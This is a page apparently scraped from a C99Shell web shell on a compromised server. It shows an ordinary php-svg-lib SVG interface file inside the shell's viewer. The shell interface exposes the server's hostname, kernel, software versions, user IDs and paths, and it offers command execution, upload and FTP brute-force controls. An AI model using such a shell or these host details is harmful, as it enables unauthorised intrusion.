!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16. PHP/5.4.16 

uname -a: Linux roko-bkp 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64 

uid=48(apache) gid=48(apache) groups=48(apache),1003(webmaster) 

Safe-mode: OFF (not secure)

/var/www/html/admin/boletos/vendor/phenx/php-svg-lib/src/Svg/Surface/   drwxr-xr-x
Free 9.23 GB of 93.48 GB (9.87%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     SurfaceInterface.php (2.1 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * @package php-svg-lib
 * @link    http://github.com/PhenX/php-svg-lib
 * @author  Fabien M�nager <fabien.menager@gmail.com>
 * @license http://www.gnu.org/copyleft/lesser.html GNU Lesser General Public License
 */

namespace Svg\Surface;

use 
Svg\Style;

/**
 * Interface Surface, like CanvasRenderingContext2D
 *
 * @package Svg
 */
interface SurfaceInterface
{
    public function 
save();

    public function 
restore();

    
// transformations (default transform is the identity matrix)
    
public function scale($x$y);

    public function 
rotate($angle);

    public function 
translate($x$y);

    public function 
transform($a$b$c$d$e$f);

    
// path ends
    
public function beginPath();

    public function 
closePath();

    public function 
fill();

    public function 
stroke();

    public function 
endPath();

    public function 
fillStroke();

    public function 
clip();

    
// text (see also the CanvasDrawingStyles interface)
    
public function fillText($text$x$y$maxWidth null);

    public function 
strokeText($text$x$y$maxWidth null);

    public function 
measureText($text);

    
// drawing images
    
public function drawImage($image$sx$sy$sw null$sh null$dx null$dy null$dw null$dh null);

    
// paths
    
public function lineTo($x$y);

    public function 
moveTo($x$y);

    public function 
quadraticCurveTo($cpx$cpy$x$y);

    public function 
bezierCurveTo($cp1x$cp1y$cp2x$cp2y$x$y);

    public function 
arcTo($x1$y1$x2$y2$radius);

    public function 
circle($x$y$radius);

    public function 
arc($x$y$radius$startAngle$endAngle$anticlockwise false);

    public function 
ellipse($x$y$radiusX$radiusY$rotation$startAngle$endAngle$anticlockwise);

    
// Rectangle
    
public function rect($x$y$w$h$rx 0$ry 0);

    public function 
fillRect($x$y$w$h);

    public function 
strokeRect($x$y$w$h);

    public function 
setStyle(Style $style);

    
/**
     * @return Style
     */
    
public function getStyle();

    public function 
setFont($family$style$weight);
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0044 ]--